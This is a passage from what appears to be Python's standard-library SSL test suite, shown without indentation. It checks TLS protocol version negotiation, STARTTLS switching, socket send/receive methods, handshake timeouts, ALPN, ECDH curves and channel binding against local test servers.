self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and server
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
client_context, server_context, hostname = testing_context()
server_context.set_alpn_protocols(server_protocols)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True,
sni_name=hostname)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1_0
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
